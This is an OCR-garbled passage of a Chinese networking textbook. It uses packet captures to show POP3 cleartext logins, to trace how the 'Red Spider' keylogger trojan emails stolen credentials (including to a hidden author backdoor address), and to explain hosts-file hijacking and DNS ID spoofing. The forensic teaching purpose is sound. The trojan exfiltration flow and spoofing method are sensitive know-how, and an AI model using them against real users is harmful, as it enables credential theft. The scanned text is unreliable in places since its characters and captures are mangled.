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实 存在 这 个 用 户 , 返 回 OK。 接 下 来 ,客户 机 向 Pop3 POP3 
服务 器 传送 对 应 的 密码 ,如 果 服 务 器 密码 验证 “服务 器 客户 
成 功 ,也 返回 OK。 由 此 可 见 , POP3 接收 邮件 sername 上 
的 过 程 需要 用 户 提供 自己 的 身份 证 明 。 OK | 
客户 机 的 收 件 人 身份 验证 之 后 ,客户 机 发 | pw | 
给 服务 器 LIST 命令 ,要求 服务 器 列 出 邮箱 的 [| OK Es 


邮件 信息 。 服 务 器 收 到 LIST 命令 后 ,就 把 客 -| ms | 


户 邮箱 内 邮件 的 数量 和 大 小 发 给 客户 机 。 接 


着 ,客户 机 使 用 RETR 命令 ,依次 从 第 1 封 邮 -i 


件 开始 申请 下 载 ,而 服务 器 也 从 第 1 封 邮件 依 


次 传送 给 客户 机 。 这 就 是 POP3 接收 邮件 的 2 门 
通信 过 程 。 : 

下 面 使 用 Sniffer 分 析 POP3 接收 邮件 的 一 所 于 一 
通信 过 程 。 在 Peter 的 客户 机 ,启动 Sniffer 开 email N | 


始 监听 。 然 后 , Peter 使 用 Outlook 依次 接收 
Mike 发 来 的 邮件 。 停 止 Sniffer 开始 监听 , 查 
看 捕捉 客户 机 与 服务 器 的 通信 报 文 ( 见 
图 9-29) 。 


一 
— 


图 9-28 POP3 接收 邮件 的 通信 过 程 


I 


92.168.111.3]|TCi D- 人 -3081109946 YIN= 64240 
BP 0307 DIADIEABLEED EEREF1C6F7» 5.2 POP3 Service Read' 


BORT: peter 

PORT=1044 。 +OK velcone here 

PORT=110 PASS peter 

Po +0K 

PORT= STAT 

PORT=1044 +OK 12 15032 
IIST 


RT=1044 +0K 12 15032 
> 168.111 2 谴 ， ?> 110 人 1 ee 0 VIN=64145 


图 9-29 Sniffer 捕捉 的 POP3 用 户 身份 认证 过 程 


首先 还 是 TCP 三 次 握手 ,服务 器 端口 是 110 ,客户 机 端口 是 一 个 大 于 1024 的 随机 端 
口 。 接 下 来 是 POP3 的 通信 过 程 。 服 务 器 发 给 客户 机 OK ,表示 服务 器 的 POP3 服务 准 
备 就 绪 。 然 后 ,客户 机 传送 用 户 名 Peter 给 服务 器 。 服 务 器 验证 确实 存在 Peter 账户 , 返 
回 OK。 客 户 机 传送 Peter 账户 对 应 的 密码 Peter( 用 户 名 和 密码 相同 ) 给 服务 器 。 服 务 器 
验证 密码 正确 ,返回 OK 给 客户 机 , 收 信 人 身份 验证 阶段 完成 。 

接着 ,客户 机 发 送 STAT 命令 给 服务 器 ,请 求 服务 器 发 回 关于 邮箱 信息 的 统计 资料 。 
服务 器 返回 12 15032 ,表示 12 封 邮 件 共 15 032 字 节 大 小 。 然 后 ,客户 机 给 服务 器 发 送 
LIST 命令 ,STAT 和 LIST 命令 服务 器 返回 的 结果 是 一 样 的 ,LIST 命令 服务 器 也 返回 
12 15032。 接 着 ,客户 机 给 服务 器 发 送 TCP 报 文 确认 收 到 服务 器 发 来 的 邮箱 信息 。 服 务 
器 使 用 一 个 Text Data 报 文 把 所 有 12 封 邮件 分 别 的 大 小 都 发 送 给 客户 机 ( 见 图 9-30)。 

接 下 来 是 客户 机 接收 5 封 新 邮件 的 过 程 。 如 图 9-31 所 示 ,客户 机 用 RETR 7 命令 向 
服务 器 请 求 第 7 封 邮件 ,服务 器 返回 第 7 封 邮件 的 大 小 1367 字 节 。 客 户 机 返回 TCP 确 
认 报 文 。 接 着 ,服务 器 传 给 客户 机 一 个 包含 邮件 正文 的 Text Data 报 文 。 这 个 报 文 与 
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POP3 POP3 Data 
POP3 
FOP3: Line 1: 1 404 
POP3: Line 2: 2 1394 
POP3: Line 3: 3 1386 
POP3: Line 4: 4 1382 
POP3: Line 5: 5 1402 
POP3: Line 6: 6 1368 
POP3: Line 7: 7 1367 
POP3: Line 8: 8 1414 
POP3: Line 9: 9 1370 
POP3: Line 10: 10 1382 
POP3: Line 11: 11 1440 
BB POP3: Line 12: 12 723 
POP3: Line 13 
FOP3 


图 9-30 ”Text Data 报 文 的 POP3 层 信息 


SMTP 发 送 邮件 的 Text Data 报 文 类 似 , 邮 件 的 正文 部 分 也 是 使 用 base64 编码 。 客 户 机 
接着 按照 上 述 过 程 依次 接收 第 8 一 12 封 邮件 。 


[192.168.111 
[192.168.111 
192 168 111 
1 
1 
1 


[192.168.11 
[192.168 .11 
[192.168.11 
[192.168 111 
[192 .168 111 
[192.168.111 


[192.168.11 
[192.168.11 


]| [192.168.111.3] 
]| [192.168.111.2] 
192 168 lll 3 


]| [192.168.111.3] 
] [192.168.111.2] 
] [192.168.111.3] 
] [192.168.111.2] 
] [192.168.111.3] 
]|[192.168.111.2] 
] [192.168.111.3] 
] [192.168.111.2] 
]|[192.168.111.3] 
]|[192.168.111.2] 
]|[192.168.111.3] 
] [192.168.111.2] 
] [192.168.111.3] 
] [192.168.111.2] 
] [192.168.111.3] 
] [192.168.111.2] 
] [192.168.111.3] 
] [192.168.111.2] 
] [192.168.111.3] 
]| [192.168.111,2] 
]|[192.168.111,3] 
]|[192.168.111.2] 


POP3: C PORT=110 
POP3: R PORT=1044 
TCP: D=110 S=1044 


POP3: C PORT=110 
POP3: R PORT=1044 
TCP: D=110 S=1044 
POP3: R PORT=1044 
POP3: C PORT=110 
POP3: R PORT=1044 
TCP: D=110 S=1044 


TCP: D=110 S=1044 

POP3: R PORT=1044 

POP3: C PORT=110 

POP3: R PORT=1044 
i 


Text Data 

RETR 7 

+0K 1367 octets, 
ACK=3081110593 WIN=63593 


RETR 8 
+OK 1414 octets 
ACK=3081111982 WIN=64223 


+OK 1370 octets 
ACK=3081113418 WIN=62787 

Text Data 

RETR 10 

+OK 1382 octets 
ACK=3081114810 WIN=64223 

Text Data 

RETR 11 

+OK 1440 octets 
ACK=3081116214 WIN=62819 


ets 
ACK=3081117675 WIN=64224 

Text Data 

QUIT 

+0K bye 


es Line 22: Content-Transfer-Encoding: base64 


图 9-31 


Sniffer 捕捉 的 POP3 依次 接收 邮件 的 通信 过 程 


所 有 的 新 邮件 接收 完成 之 后 ,客户 机 发 送 一 个 QUIT 命令 ,服务 器 返回 OK bye。 


POP3 接收 邮件 的 过 程 就 完成 了 。 最 后 是 终止 TCP 连接 的 四 次 挥手 。 


从 服务 器 验证 收 信人 身份 的 过 程 ,可 以 得 出 POP3 使 用 明文 传送 用 户 名 和 密码 ,具有 
安全 隐患 。 为 了 解决 这 个 问题 ,就 有 了 POP3 的 APOP 认证 机 制 ,但 是 Outlook 和 


Foxmail 都 不 支持 APOP, 支 持 APOP 的 邮件 客户 端 有 Dreammail 和 Koomail。 


利用 Sniffer 追查 盗号 木马 线索 


& 5 


盗号 木马 属于 木马 的 一 种 。 盗 号 木马 盗 取 了 账号 密码 信息 后 ,怎样 把 这 些 信息 发 送 


给 黑客 呢 ? 其 中 的 一 种 方法 就 是 通过 电子 邮件 把 盗 取 的 信息 发 送 到 黑客 邮箱 中 。 


盗号 木马 被 种 植 到 目标 主机 上 以 后 ,会 自动 隐藏 起 来 ,在 后 面 默默 工作 ,监控 信息 。 
只 要 目标 主机 的 某 个 登录 窗口 一 出 现 (如 QQ 登录 窗口 ,邮件 登录 窗口 等 ), 就 开始 记录 这 
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个 窗口 中 输入 的 任何 信息 。 然 后 ,盗号 木马 把 它 记录 下 的 监控 信息 定期 发 送 到 黑客 指定 
的 邮箱 中 。 黑 客 会 定期 到 他 指定 的 邮箱 接收 盗号 木马 返回 的 信息 。 

下 面 以 红 蜘蛛 盗号 木马 为 例 , 学 习 使 用 Sniffer 追查 盗号 者 的 线索 。 红 蜂 蛛 盗号 木马 
是 针对 Web 登录 邮箱 的 情况 , 盗 取 从 网 页 中 输入 的 邮箱 账号 密码 。 

黑客 在 配置 红 蜘蛛 木马 时 ( 见 图 9-32) ,会 把 一 些 常 用 邮箱 登录 网 页 的 标题 关键 字 输 
入 到 红 蝴 蛛 监 控 列 表 中 。 只 要 有 这 些 标题 的 网 页 
出 现 , 红 蝴 蛛 就 会 开始 工作 ,记录 下 窗口 中 输入 的 
所 有 信息 。 此 外 ,在 红 蜂 蛛 木 马 配 置 窗口 ,还 需要 
设置 黑客 收 信 的 邮箱 地 址 和 密码 .发送 邮件 的 一 
SMTP 服务 器 地 址 .邮件 的 主题 ( 红 蜘 蛛 的 礼物 )、 
发 送 邮件 的 时 间 间 隔 。 红 蜘蛛 木马 记录 下 的 账户 


有 红 愧 蛛 键 盘 记 录 器 


密码 信息 不 马上 发 送 ,而 是 按照 一 个 固定 的 间隔 ， 3 
a 您 的 收 信和 邮箱 : 推荐 6163. com 邮 箱 
如 每 隔 20min 发 一 次 。 这 样 它 的 隐藏 性 更 强 。 estates com 发 全 


邮箱 密码 ; 


红 蜂 蛛 木 马 被 种 植 到 受害 者 主机 上 之 后 , 当 用 | gingg: Fe 


户 从 Web 登录 自己 的 邮箱 时 ,用 户 输入 的 邮箱 账 | 尖 半 的 和 名 标题 : 红 晤 时 的 礼物 
发 信 时 间 间 隔 : 后 


户 和 密码 就 会 被 红 蜂 蛛 记录 下 来 ,通过 邮件 发 送 到 ”| ogees cmashi srl 


smtp. 163. com 


黑客 邮箱 中 。 黑 客 会 定期 登录 自己 的 邮箱 ,查看 主 设置 完毕 ,点击 生成 服务 油 
题 是 “ 红 蜂 蛛 的 礼物 ”的 邮件 ,取得 红 蜂 蛛 瓷 取 的 邮 | - 儿 8 涪 盟 | ”_ 如 条 购 买 正式 版 及 正式 版 功能 介绍 
件 用 户 名 和 密码 。 本 软件 请 妇 用 于 非法 用 途 ， 一切 使 用 后 果 由 用 户 承 担 。 


怎样 追查 红 蜂 蛛 盗 号 木马 的 线索 呢 ? 可 以 借 
助 Sniffer 监听 受害 者 主机 上 红 蜂 蛛 发 出 的 信息 
可 以 直接 把 Sniffer 安装 在 受害 者 主机 上 ;也 可 以 使 用 交换 机 端口 镜像 的 方法 ,通过 镜像 
端口 监控 主机 上 的 Sniffer 捕获 受害 者 主机 的 通信 信息 。 

查看 Sniffer 捕捉 到 的 红 蜂 蛛 发 送 的 报 文 ( 见 图 9-33)。TCP 三 次 握手 后 ,服务 器 发 
出 220 响应 ,客户 机 返回 EHLO 命令 ,服务 器 再 返回 250 响应 ,是 建立 了 邮件 连接 。 接 着 
服务 器 开始 对 客户 机 的 发 信人 身份 认证 ,要 求 客 户 机 分 别 发 送 发 信人 用 户 名 和 密码 。 服 
务 器 对 客户 机 发 信人 的 身份 成 功 认 证 后 ,就 来 到 了 传送 邮件 阶段 。 接 下 来 ,客户 机 给 服务 
器 发 送 发 信人 的 邮件 地 址 、 收 信人 的 邮件 地 址 和 邮件 的 正文 内 容 。 在 邮件 的 正文 中 ,就 包 
含 红 蜂 蛛 在 受害 者 主机 记录 下 来 的 用 户 邮箱 的 用 户 名 和 密码 。 从 以 上 通信 过 程 ,可 以 得 

tp .163 plat 293 168 Bo130i TP ee 2 St 和 LEN-0 VIN-5840 
com Anti-spanm GT for Coremail System (163con[200| 


二 os Jdf 
ACK-384423564 WIN=5840 


图 9-32 红 蜂 蛛 木 马 的 配置 界面 


t Data 
3 UGFzc3dvcnQ6 


ext Data 
玉 thontication successful 
L FROM : :fueRaAs’, :woSANA163 .con> 
280 Mail OK 


PRR 63 .com> 
sntp.163.split.|[192.168.8.120]|SMTP 
3 8 宇内 ete 了 SP a 
Spl 19 


图 9-33 ”Sniffer 捕 提 的 红 蜂 蛛 键盘 记录 木马 向 外 发 送信 息 的 报 文 
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出 红 蜂 蛛 使 用 ESMTP 向 外 发 邮件 ,发 信人 身份 需要 验证 ,发 信人 和 收 信 人 的 邮箱 地 址 都 
是 黑客 邮箱 地 址 。 

传送 邮件 正文 内 容 之 后 ,就 是 终止 邮件 连接 阶段 ( 见 图 9-34)。 客 户 向 服务 器 发 送 
QUIT 命令 ,服务 器 返回 221 响应 ,邮件 服务 器 的 服务 功能 关闭 。 然 后 后 面 还 有 释放 
TCP 连接 的 四 次 挥手 。 但 是 ,在 释放 了 这 个 TCP 连接 的 四 次 挥手 之 后 ,又 通过 三 次 握手 
建立 了 一 个 TCP 连接 ,发 信人 身份 验证 后 ,进行 邮件 传递 。 通 过 观察 Sniffer 捕捉 到 的 报 
文 , 发 现 发 信人 的 邮箱 账户 还 是 那个 黑客 的 邮箱 账户 ,而 收 信 人 的 邮箱 账户 却 变 成 了 
redspider119@163。 这 说 明 红 蜂 蛛 木马 的 编写 者 给 自己 留 下 的 一 个 后 门 ,所 有 用 红 蜂 蛛 
木马 盗 取 的 邮件 用 户 名 和 密码 给 黑客 发 邮件 的 同时 也 自动 给 红 蜘 蛛 编写 者 发 送 一 份 , 因 
此 ,这 个 红 蜂 蛛 木 马 的 编写 者 是 最 大 的 受益 者 。 


T192168.8.120]/smtp.163. split. [SMTP: C PORT=1127 QUIT 
smtp.163.split.| [192.168.8.120]| TCP: D=1127 S=25 ACK=764423900 WIN=5840 
ntp.163. split. [192.168.8.1 R = 21 Bye 
[192.168.8.120]|sntp.163.split. TCP: D=25 S=1127 FIN ACK=2514873493 SEQ=764423900 LEN=0 WIN=65174 
nt 163 srlit, [152.169.8.120] TGP: D-1127 S725 FIN ACK-?64423900 SEQs2514873493 LEN=O UIN"5840 
[192.168.8.120]|sntp.163.split. TCP: D=25 S- ACK=2514873494 WIN= 
[192.168.8.120]|sntp.163.spl D=25 S=1128 SYN SEQ=3685817740 LEN=0 WIN=65535 
sntp.163.split, |[192.168.8,120]| TCP; D=1127 ACK=764423901 VIN=S: 
nt 163. snlis: [192.169.8.120] TCP: D-1128 $725 SYH ACK=3685817741 SE9-2506402924 IEN0 WIN"5840 
[192.168.8.120]|sntp.163.split. |TCP: D=25 S=1 ACK32506402925 VIN 
ntp 3 split) F153.168. Br130] SHTp. R PORT 22001 spaw GT for Corenail Systen (163con[200 
[192 8.120] sntp.163.split. SMTP: C PORT=: jd 人 
Entp 163.split, |[192 168.8.120] TGP Del128"S 2 617752 VIN=5840 

1 


RT=1128 

JRT=1128 

RT=1128 A IN 
smtp.163, split. |[192.168.8.120]|SMTP JRT=1128 334 dcashbyq6 
[192.168.8 120] sntp 163 .split .|SMTP RT=1128 
smtp.163.split.|[192.168.8.120] SMTP RT=1128 
RT=1128 
RT=1128 


R 
C 
R 
C Text 
R 

C192 168.8.120] smntp.163.split. |SMTP: C 
R 
C 
3 
R 
c 
R 


334 oaavenok 
Text 

p.163.split, [192.168.8.120]| SMTP 
531 和 8 120] | ents ee 1 局 时 
nt 四 Spl 


235. ukentication successful 
JRT=1128 MAIL FROM a VESB163 .com> 


250 Mail Oi 
RT=11 RCPT TO “redspi 
RT=1128 。 250 Mail OK 


| 192 168.8 120]| SE 
53 168 让 1335 sntp.163.split. |SMTP 
smtp.163.split. [192.168.8.120]|SMTP 


EE 
oi 


354 End data with ¢CR»¢LF>.¢CR><IF> 


图 9-34 Sniffer 捕 提 的 红 蜂 蛛 键盘 记录 木马 向 红 蜂 蛛 木马 编写 者 发 送 邮 件 信息 


9.6 ”因特网 的 域名 结构 


用 户 与 因特网 上 某 个 主机 通信 时 ,使 用 IP 地 址 很 难 记 忆 , 而 愿意 使 用 某 种 易于 记忆 
的 域名 地 址 。 因 特 网 的 域名 地 址 和 IP 地 址 一 样 , 都 必须 是 唯一 的 。 

域名 地 址 的 结构 采用 了 层次 树 状 结构 的 命名 方法 ,可 以 划分 成 多 个 子 域 ,各 子 域 之 间 
用 点 隔 开 : 

“三 级 域名 . 二 级 域名 . 顶级 域名 

级 别 低 的 域名 写 在 左边 ,级别 最 高 的 顶级 城 名 则 在 最 右边 。 各 级 城 名 由 上 一 级 的 域 
名 管理 机 构 管 理 ,最 高 的 顶级 域名 由 因特网 的 有 关机 构 管 理 。 

现在 顶级 域名 有 三 大 类 : 

(1) 国家 顶级 域名 。 如 : . cn 表示 中 国 ;. us 表示 美国 ;. uk 表示 英国 ,等 等 。 现 在 使 
用 的 国家 顶级 域名 约 有 二 百 多 个 。 

(2) 国际 项 级 域名 。 采 用 . int, 国 际 性 的 组 织 可 在 .int 下 注册 。 

(3) 通用 顶级 域名 。 最 早 共 6 个 , 即 : . com 表示 公司 企业 ;. net 表示 网 络 服务 机 
org 表示 非 赢利 性 组 织 ;. edu 表示 教育 机 构 ( 美 国 专用 );. gov 表示 政府 部 门 (美国 专 

用 ) ;. mil 表示 军事 部 门 (美国 专用 ) 。 
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在 国家 级 顶级 域名 下 注册 的 二 级 域名 均 由 该 国家 自行 确定 。 我 国 在 顶级 域名 . cn 下 
将 二 级 域名 划分 为 “类 别 域名 ”和 “行政 区 域名 ”两 大 类 。 其 中 : 

类 别 域名 6 个 ,分 别 为 : . ac 表示 科研 机 构 ;. corn 表示 工 、 商 、 金 融 等 企业 ;. edu 表示 
教育 机 构 ;. gov 表示 政府 部 门 ;. net 表示 互连网 络 、 网 络 信 息 中 心 和 网 络 运 行 中 心 ;. org 
表示 各 种 非 赢利 性 的 组 织 。 

行政 区 域名 34 个 ,适用 于 我 国 的 各 省 .自治 区 直辖市。 例如: . bj 为 北京 市 ;. sh 为 
上 海 市 ;.js 为 江苏 省 ,等 等 。 

因特网 域名 地 址 的 结构 ,实际 上 是 一 棵 倒 过 来 的 树 。 树 根 下 面 的 一 级 结 点 就 是 顶级 
域 结 点 ,再 下 面 是 二 级 域 结 点 。 最 下 面 的 叶子 结 点 就 是 单 台 计算 机 。 图 9-35 列举 了 一 些 
域名 作为 例子 。 凡 是 在 顶级 域名 . cn 下 注册 的 ,都 会 被 分 配 一 个 二 级 域名 。 几 是 在 某 一 
个 二 级 域名 下 注册 的 单位 就 可 以 获得 一 个 三 级 域名 。 如 在 . edu 二 级 域名 下 的 三 级 域名 
有 : 清华 大 学 ,东北 大 学 、 中 国 刑事 警察 学 院 等 。 一 旦 某 个 单位 拥有 了 一 个 域名 , 它 就 可 
以 自己 决定 是 否 要 进一步 划分 其 下 属 的 子 域 ,并 且 不 必 将 这 些 子 域 的 划分 情况 报告 上 级 
机 构 。 例 如 ,在 中 国 刑事 警察 学 院 下 的 四 级 域名 是 mail ,jzx 等 。 


Root Domain 根 域 


Top-Level Domain 


顶级 域 


Second-Level Domain 


Subdomains 


Host name: mail 


Host name: jzx 


图 9-35 因特网 的 域名 空间 


9.7 ”域名 服务 器 进行 域名 解析 


域名 系统 是 提供 IP 地 址 到 域名 地 址 解析 的 程序 ,英文 字母 缩写 是 DNS。 在 计算 机 
网 络 出 现 的 初期 ,整个 网 络 上 只 有 数 百 台 计 算 机 , 那 时 只 使 用 一 个 文件 就 可 以 列 出 所 有 主 
机 域名 地 址 和 IP 地 址 的 对 应 关系 。 但 是 , 随 着 因特网 规模 的 扩大 ,因特网 开始 使 用 联机 
分 布 式 的 域名 系统 ,采用 客户 服务 器 方式 ,域名 地 址 到 IP 地 址 的 解析 由 若干 个 域名 服务 
顺 完 成 。 

域名 服务 器 系统 也 是 按照 域名 的 层次 结构 来 安排 的 。 每 一 个 域名 服务 器 都 只 对 域名 
体系 中 的 一 部 分 进行 管辖 。 因 特 网 共有 三 种 不 同类 型 的 域名 服务 器 。 


246 


Egg 第 9 章 ， SMTP/POP3 及 DNS 协议 me 


本 地 域名 服务 器 : 每 一 个 因特网 服务 器 提供 者 ISP 或 一 家 单位 .一 所 大 学 ,都 可 以 拥 
有 一 个 本 地 域名 服务 器 。 本 地 域名 服务 器 离 用 户 较 近 ,一般 不 超过 几 个 路 由 器 的 距离 。 

根 域 名 服务 器 : 管辖 顶级 域 ,目前 因特网 上 有 十 几 个 根 域 名 服务 器 ,大 部 分 都 在 
引 美 。 

授权 域名 服务 器 : 每 一 个 主机 都 必须 在 授权 域名 服务 器 处 登记 。 通 常 一 个 主机 的 授 
权 域 名 服务 器 就 是 它 本 地 ISP 的 一 个 域名 服务 器 。 实 际 上 ,为 了 更 加 可 靠 地 工作 ,一 个 主 
机 最 好 至 少 有 两 个 授权 域名 服务 器 。 许 多 域名 服务 器 既是 本 地 域名 服务 器 ,又 是 授权 域 
名 服务 器 。 

每 个 域名 服务 器 都 维护 一 个 高 速 缓存 ,存放 最 近 用 过 的 域名 到 IP 的 映射 记录 。 当 客 
户 机 向 域名 服务 器 发 出 请 求 时 ,域名 服务 器 首先 检查 自己 管理 的 区 域 授权 登记 的 文件 中 
是 否 保存 这 个 域名 到 IP 的 映射 记录 。 这 个 域名 服务 器 自己 管理 区 域内 授权 登记 的 文件 
叫 区 域 文件 。 如 果 在 域名 服务 器 的 区 域 文件 中 能 够 找到 客户 请 求 的 域名 地 址 及 其 对 应 的 
IP 地 址 ,就 及 时 向 客户 反馈 。 如 果 在 域名 服务 器 的 区 域 文 件 中 ,没有 找到 客户 请 求 的 域 
名 地 址 , 则 域名 服务 器 就 查看 自己 的 高 速 缓存 ,检查 是 否 在 缓存 中 保存 该 转换 记录 ,如 果 
有 也 及 时 向 客户 反馈 。 在 域名 服务 器 进行 域名 查询 过 程 是 先 查 区 域 文 件 ,再 查 高 速 缓存 。 

域名 的 解析 过 程 如 下 : 当 某 一 个 主机 作为 源 主 机 要 和 一 目的 主机 通信 ,假如 源 主 机 
只 知道 目的 主机 的 域名 地 址 ,而 不 知道 目的 主机 的 IP 地 址 ,为 了 得 到 目的 主机 的 IP 地 
址 ,本 地 主机 就 向 本 地 域名 服务 器 发 送 一 个 DNS 请 求 报 文 ,把 待 解析 的 目的 主机 域名 放 
在 DNS 请 求 报 文 中 ,以 UDP 数据 报 方式 发 给 本 地 域名 服务 器 。 本 地 的 域名 服务 器 收 到 
这 个 DNS 请 求 报 文 后 ,查询 它 的 区 域 文件 和 高 速 缓 存 ,如 果 找 到 匹配 的 域名 和 其 对 应 的 
IP 地 址 , 则 放 在 DNS 回答 报 文中 返回 给 发 起 查询 的 源 主机 。 源 主机 获得 目的 主机 的 IP 
地 址 后 即 可 进行 通信 。 

上 述 的 域名 解析 过 程 是 本 地 域名 服务 器 能 够 找到 客户 请 求 域名 的 情况 ,如 果 本 地 域 
名 服务 器 找 不 到 匹配 的 域名 ,就 不 能 回答 这 个 DNS 请 求 报 文 , 则 本 地 域名 服务 器 便 以 
DNS 客户 的 身份 向 某 一 个 根 域 名 服务 器 查询 。 若 根 域名 服务 器 有 被 查询 主机 的 信息 , 便 
发 送 DNS 回答 报 文 给 本 地 域名 服务 器 ,然后 本 地 域名 服务 器 再 回答 发 起 查询 的 主机 。 若 
根 域 名 服务 器 设 有 被 查询 主机 的 信息 时 , 它 一 定 知道 在 哪个 授权 域名 服务 器 中 有 被 查询 
主机 的 名 字 ,这 个 授权 域名 服务 器 可 能 是 根 域 名 服务 器 下 的 一 个 二 级 或 三 级 域名 服务 器 。 
根 域 名 服务 器 就 直接 将 这 个 下 属 的 授权 域名 服务 器 的 IP 地 址 返回 给 本 地 域名 服务 器 , 然 
后 让 本 地 域名 服务 器 直接 向 授权 域名 服务 器 进行 查询 ,把 查询 的 结果 返回 给 发 起 查询 的 
主机 。 这 个 域名 查询 的 过 程 被 称 为 递归 和 迭代 相 结合 的 查询 ( 见 图 9-36) 。 

如 果 源 主机 和 目的 主机 每 次 通信 都 进行 域名 请 求 , 都 要 等 待 域 名 服务 器 解析 后 返回 
信息 , 源 主机 才能 和 目的 主机 通信 ,这 样 访问 网 络 的 效率 就 会 降低 。 为 了 提高 访问 网 络 的 
效率 ,可 以 通过 本 机 的 域名 解析 系统 。 根 据 Windows 系统 规定 ,在 向 本 地 DNS 服务 器 请 
求 以 前 ,Windows 系统 会 先 检查 本 机 的 DNS 缓存 以 及 本 机 的 Hosts 文件 。 

本 机 的 DNS 缓存 包括 本 机 最 近 用 过 的 域名 到 IP 的 映射 记录 , 它 是 本 机 最 近 从 DNS 
服务 器 查询 返回 的 信息 , 先 暂 存在 本 机 的 缓存 中 。 使 用 ipconfig/displaydns 命令 可 以 查 
询 本 机 DNS 缓存 ( 见 图 9-37)。 
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根 域名 
服务 器 
®, | © 
授权 域名 © 授权 域名 2 本 
服务 器 加 服务 器 服务 器 


图 9-36 递归 和 选 代 相 结合 的 查询 


jc: pocuments and Settings\Adninistrator>ipconf ig/displaydns 


Mindows IP Configuration 


i3.sinaing.cn 

Record Nane : i3.sinaing.cn 
Record Type . 5 

Tine To Live - - 1 

Data Length . . . 4 

Section - . - .. Answer 

CNAME Record ww.sinaing.cn 


Record Nane . . - 
Record Type - - - 
Tine To Live .. 
Data Length . 


acon-sina-comn-cn 


Section .i sver 

A 《Host》 Record . . - : 282.97.199.49 
Record Nane . . - . - : beacon.sina.com.cn 
Record Type - - - 1 

Tine To Live . - 


25 
Data Length - - - 4 
Section - - - - - . - : hnswer 
A 《Host》 Record . . . : 292.97.199.58 


Record Nane . . . . . : beacon.sina.con.cn 
Record Type - - - 1 

Tine To Live - - 25 

Data Length . . - 4 

BO ws win es Answer 

A 《Host》 Record . . . : 282.97.199.48 


图 9-37 查询 本 机 的 DNS 缓存 


本 机 的 Hosts 文件 ( 见 图 9-38) ,对 于 Windows XP 系统 来 说 ,保存 在 C:\WINDOWS 
\system32\drivers\etc 中 。Heosts 文件 是 一 个 纯 文本 的 文件 , 它 定义 了 一 些 IP 地 址 和 域 
名 地 址 的 映射 关系 。 

通常 情况 下 , 源 主 机 和 目的 主机 进行 通信 时 ,首先 进行 本 地 域名 解析 , 先 检查 本 机 的 
DNS 高 速 缓存 ,接着 检查 本 机 的 Hosts 文件 。 查 看 是 否 有 要 解析 的 这 个 域名 地 址 到 IP 
的 映射 。 如 果 有 , 则 源 主机 就 可 以 很 快 得 到 目的 主机 的 IP 地 址 ,和 目的 主机 进行 通信 ;如 


果 没 有 , 则 再 向 本 地 DNS 服务 器 提出 域名 解析 。 
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Elhostsdiz oe 
编辑 (E) 格式 (0) 查看 (W) 帮助 ( 轩 


-1 yu.8s7.net 
-1 1.jopanqc-com 
-1 2.joppnqq-con 
加 -47255-com 
1-joppnqq-com 
- XXX -m111-biz 
-1 1-.jopenqc-com 
-1 1.jopenkk.con 
XXX -uh7 .biz 
XXX -ja1m-com 
-1 3.joppnqq-con 
d-93se -com 


-1 www-868ug .com 
-1 XXX-mmma-biz 

-1 iloue-com 

-1 tp.shpzhan.cn 
-1 www-tomwg-com 


-1 www-cike997 .cn 

-1 www-22aaa-com 

-1 xxX-exiao81.com 

- ww -exiao81-com 

- Www-exiao81-com 

-1 new-789571-com 

- xtx -ku8-info 

- cao -ku8_.info 

.1 1.jopmnqq.com 

- 171817 -171817 -com 


图 9-38 查询 本 机 的 Hosts 文件 


9 .8 DNS 欺骗 


如 果 本 机 系统 被 种 植木 马 后 , 黑 客 通 过 远程 控制 来 算 改 Hosts 文件 ,使 部 分 常用 域 
名 映射 到 一 些 恶意 的 挂 马 或 钓鱼 网 站 的 IP 地 址 ,使 用 户 不 经 意 间 访 问 了 这 些 黑 客 网 站 。 
这 种 攻击 叫做 本 机 DNS 劫持 。 例 如 ,如 果 用 户 想 用 百度 搜索 一 些 信息 , 毫 无 疑问 会 在 济 
览 器 地 址 栏 里 输入 域名 地 址 www. baidu. com。 但 是 ,用 户 却 非常 吃惊 地 发 现 打开 的 是 
Google 网 页 。 而 当 用 户 在 浏览 器 地 址 里 输入 Baidu 的 IP 地 址 时 ,又 会 发 现 其 实 百度 网 站 
依然 存在 。 这 说 明 用 户主 机 遭 到 了 DNS 域名 劫持 攻击 。 在 主机 的 Hosts 文件 中 ,加 上 一 
条 Google IP 地 址 对 应 Baidu 域名 的 记录 ,Hosts 文件 被 算 改 。 

DNS 请 求 报 文 首部 有 个 ID 字段 ,是 用 来 匹配 DNS 请 求 报 文 和 DNS 回答 报 文 的 。 
如 果 某 个 源 主机 要 和 某 个 目的 主机 通信 ,为 了 得 到 目的 主机 的 IP 地 址 , 源 主机 向 域名 服 
务 器 以 特定 的 ID 发 送 DNS 请 求 报 文 ,把 待 解析 的 目的 主机 域名 放 在 DNS 请 求 报 文中 发 
送 给 域名 服务 器 。 域 名 服务 器 查询 到 对 应 的 IP 地 址 后 , 放 在 DNS 回答 报 文中 ,以 相同 
ID 号 的 DNS 回答 报 文 返回 给 源 主机 。 源 主机 收 到 DNS 回答 报 文 后 ,会 将 收 到 的 DNS 
回答 报 文 的 ID 和 自己 发 送 的 DNS 请 求 报 文 ID 相 比较 , 如 果 收 到 的 DNS 回答 报 文 的 ID 
和 自己 发 送 的 DNS 请 求 报 文 ID 号 相同 ,能 匹配 上 , 则 表明 客户 端 接收 到 的 正 是 自己 等 待 
的 DNS 报 文 。 如 果 收 到 的 DNS 回答 报 文 的 ID 和 自己 发 送 的 DNS 请 求 报 文 ID 号 不 相 
同 ,不 能 匹配 上 ,客户 端 则 丢弃 这 个 收 到 的 DNS 回答 报 文 。 

由 于 发 起 DNS 查询 的 客户 机 没有 任何 其 他 验证 .只 是 通过 匹配 DNS 回答 报 文 ID 和 
DNS 请 求 报 文 ID 是 否 相 同 , 来 辨别 是 否 是 DNS 服务 器 回复 的 那个 回答 报 文 。 这 就 给 了 
黑客 一 个 可 以 利用 的 DNS 漏洞 ,导致 了 DNS 欺骗 的 产生 。 
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如 果 黑 客 通 过 网 络 监听 得 到 客户 机 向 外 发 送 的 DNS 请 求 报 文 ( 目 的 端口 为 53), 黑 
客 从 DNS 请 求 报 文中 提取 出 ID 信息 ,然后 假冒 DNS 服务 器 ,伪造 与 这 个 DNS 请 求 报 文 
ID 号 相同 的 DNS 回答 报 文 。 在 伪造 的 DNS 回答 报 文中 ,黑客 把 客户 机 要 访问 的 域名 地 
址 解析 为 黑客 网 站 的 IP 地 址 。 这 个 伪造 的 DNS 回答 报 文 要 在 真正 的 DNS 服务 器 回 送 
的 回答 报 文 到 达 客 户 机 之 前 被 送 到 客户 机 ,致使 客户 机 访问 黑客 的 恶意 网 站 。 虽 然 客户 
